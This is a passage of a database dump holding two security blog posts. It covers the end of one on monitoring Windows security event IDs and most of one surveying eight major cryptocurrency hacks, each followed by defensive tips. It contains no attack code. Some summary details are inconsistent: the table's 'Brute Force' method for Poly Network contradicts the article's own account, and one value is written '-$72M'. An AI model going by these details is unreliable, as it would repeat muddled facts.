pb-[2px]\"></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Monitoring this event ID provides an additional layer of protection against unauthorized access to critical files.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Best Practices for Monitoring Windows Security Logs</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To effectively monitor these <b><strong class=\"font-bold\">critical Windows security event IDs</strong></b>, incorporate the following best practices:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Set up Strong Audit Policies</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ensure your logs are configured to capture relevant event IDs. Without proper audit policies, critical events might not even be logged.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Implement Log Aggregation Tools</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Use a centralized logging solution, such as SIEM tools, to aggregate, monitor, and analyze event logs across multiple resources in one dashboard.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Establish Monitoring Alerts</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Set alerts for the most suspicious single-occurrence activities, including log clearance attempts or failed login attempts.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"4\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Analyze Frequency Patterns Regularly</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Establish a baseline frequency for standard activities. Use this data to identify any unusual surges that could signal malicious intent.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"5\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Leverage Advanced AI Tools</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For efficient monitoring, use AI-powered cybersecurity solutions to detect abnormal behavior faster and more accurately.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"6\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\"><b><strong class=\"font-bold\">Educate Your Team</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ensure your IT and security team understands these event IDs and why they’re critical. Equip them with the knowledge to act swiftly when red flags arise.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Elevate Your Security Posture with Comprehensive Monitoring</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understanding and monitoring these <b><strong class=\"font-bold\">Windows Security Event IDs</strong></b> is essential for maintaining a robust cybersecurity framework. Proactive log monitoring can help you identify and neutralize threats before they impact your <b><strong class=\"font-bold\">crypto security</strong></b> or business operations.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Keep your Windows environment secure, safeguard your data’s integrity, and maintain operational continuity by focusing on these eight key event IDs. Trust us when we say your proactive efforts will pay off in long-term protection.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For more insightful tips on tightening your <b><strong class=\"font-bold\">cybersecurity posture</strong></b> and leveraging event IDs to your advantage, bookmark this page or explore our resources!</p>', '', NULL, NULL, 1, 'draft', '2024-08-01 03:28:16', '2026-01-12 21:41:44', 'Information Security', 'The 8 Most Critical Windows Security Event IDs You Need to Monitor', '', NULL),
(121, 'Top Cryptocurrency Hacks: Lessons in Cybersecurity', 'top-cryptocurrency-hacks-lessons-in-cybersecurity', 'The cryptocurrency space has seen tremendous growth over the years, revolutionizing finance and attracting millions of users. But with great opportunities come significant risks, as the rise of crypto-related cyberattacks has shown. From major exchanges to individual wallet holders, these hacks target vulnerabilities and highlight the need for stronger security in the blockchain ecosystem.This blog will explore some of the most significant crypto hacks in history, explain how they happened, and provide actionable insights to improve crypto security. By learning from these incidents, you can better protect your investments and safeguard your digital assets.\r\n\r\nThe cryptocurrency industry has experienced several significant security breaches over the years. These incidents highlight the critical need for robust cybersecurity measures to protect digital assets. Below is a snapshot of some of the largest hacks in the cryptocurrency space:\r\n\r\n<hr />\r\n\r\n<table>\r\n<thead>\r\n<tr>\r\n<th><strong>Platform</strong></th>\r\n<th><strong>Date of Hack</strong></th>\r\n<th><strong>Method</strong></th>\r\n<th><strong>Value Stolen</strong></th>\r\n</tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td><strong>Poly Network #1</strong></td>\r\n<td>August 2021</td>\r\n<td>Targeted System Vulnerability: Brute Force</td>\r\n<td>$610M</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Coincheck #2</strong></td>\r\n<td>January 2018</td>\r\n<td>Phishing Malware</td>\r\n<td>$533M</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Mt. Gox #3</strong></td>\r\n<td>2011 – 2014</td>\r\n<td>Various</td>\r\n<td>$470M</td>\r\n</tr>\r\n<tr>\r\n<td><strong>The Wormhole #4</strong></td>\r\n<td>February 2022</td>\r\n<td>Targeted System Vulnerability</td>\r\n<td>$321M</td>\r\n</tr>\r\n<tr>\r\n<td><strong>KuCoin #5</strong></td>\r\n<td>September 2020</td>\r\n<td>Unknown</td>\r\n<td>$281M</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Bitmart #6</strong></td>\r\n<td>December 2021</td>\r\n<td>Unknown</td>\r\n<td>$196M</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Bitfinex #7</strong></td>\r\n<td>August 2016</td>\r\n<td>Unknown</td>\r\n<td>-$72M</td>\r\n</tr>\r\n<tr>\r\n<td><strong>The DAO #8</strong></td>\r\n<td>May 2016</td>\r\n<td>System Bug</td>\r\n<td>$70M</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"></p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Major Crypto Hacks and How They Happened</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Poly Network Hack (August 2021)</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Method</strong></b>: Exploiting System Vulnerability</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Value Stolen</strong></b>: $610M</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">What Happened?</strong></b> Hackers targeted a vulnerability in Poly Network\'s cross-chain interoperability protocol, allowing them to override instructions within the smart contract and transfer funds to their accounts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">How to Stay Safe</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Conduct thorough code audits on smart contracts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Use multi-signature wallets to prevent unauthorized transactions.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\">Regularly update systems to patch vulnerabilities.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Coincheck Hack (January 2018)</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Method</strong></b>: Phishing Malware</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Value Stolen</strong></b>: $533M</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">What Happened?</strong></b> Cybercriminals infiltrated Coincheck’s systems using phishing tactics. Once inside, they gained access to a wallet containing NEM tokens.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">How to Stay Safe</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Educate staff on identifying phishing emails and tactics.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Use robust email security solutions to prevent unauthorized access.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\">Implement multi-factor authentication (MFA) for sensitive operations.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Mt. Gox Hack (2011-2014)</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Method</strong></b>: Various Breaches</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Value Stolen</strong></b>: $470M</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">What Happened?</strong></b> Over several years, attackers exploited multiple weak points in Mt. Gox\'s system, including poor security practices. These breaches led to the loss of hundreds of millions of dollars in Bitcoin.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">How to Stay Safe</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Conduct regular security audits to evaluate and strengthen protocols.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Store the majority of funds in cold wallets (offline storage).</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\">Use real-time transaction monitoring to detect suspicious activity.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. The Wormhole Hack (February 2022)</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Method</strong></b>: Exploiting Vulnerability in Bridge Protocol</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Value Stolen</strong></b>: $321M</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">What Happened?</strong></b> Hackers targeted a vulnerability in the Wormhole bridge, which connects different blockchains. They managed to mint Wormhole-wrapped Ether (wETH) without depositing the equivalent value.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">How to Stay Safe</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Rigorously test smart contracts through comprehensive audits.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Collaborate with external experts using bug bounty programs to uncover vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\">Have contingency plans in place to respond quickly to breaches.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. KuCoin Hack (September 2020)</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Method</strong></b>: Unknown</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Value Stolen</strong></b>: $281M</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">What Happened?</strong></b> Hackers accessed KuCoin’s hot wallets and stole a substantial amount of cryptocurrency. The exact attack method is still unclear.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">How to Stay Safe</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Restrict access to hot wallets and store the majority of funds in cold wallets.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Use advanced threat detection systems.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\">Incorporate multi-layered security protocols for added protection.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. Bitmart Hack (December 2021)</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Method</strong></b>: Unknown</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Value Stolen</strong></b>: $196M</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">What Happened?</strong></b> Similar to the KuCoin hack, attackers withdrew significant amounts from Bitmart’s hot wallets, though the specific method remains unknown.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">How to Stay Safe</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Strong encryption and secure wallet systems should be in place.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Regular penetration testing can help detect and prevent vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\">Maintain a robust incident response plan to limit potential losses.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. Bitfinex Hack (August 2016)</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Method</strong></b>: Unknown</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Value Stolen</strong></b>: $72M</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">What Happened?</strong></b> The hack bypassed security measures on the Bitfinex exchange, leading to substantial losses.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">How to Stay Safe</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Diversify security measures, including using hardware security modules (HSMs).</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Ensure enhanced encryption for sensitive data and wallet keys.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\">Train employees on cybersecurity best practices regularly.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">8. The DAO Hack (May 2016)</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Method</strong></b>: Exploiting Recursive Call Bug</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Value Stolen</strong></b>: $70M</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">What Happened?</strong></b> The hacker identified a vulnerability in The DAO’s smart contract related to recursive calls, enabling them to drain funds continuously.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">How to Stay Safe</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Conduct rigorous smart contract code reviews.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Use formal verification techniques to validate smart contract logic.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\">Leverage decentralized insurance mechanisms to mitigate losses.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Lessons from These Hacks</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Each of these incidents highlights the dangers posed by system vulnerabilities, social engineering attacks, and poor security practices. They also underscore the importance of continually evolving and improving crypto security practices to counter increasingly sophisticated attacks.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Strengthen Your Crypto Security</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here are some practical tips to secure your cryptocurrency holdings against potential hacks:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Use Cold Storage</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Store the majority of your funds offline in cold wallets. These wallets aren’t connected to the internet, making them immune to online hacking attempts.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" 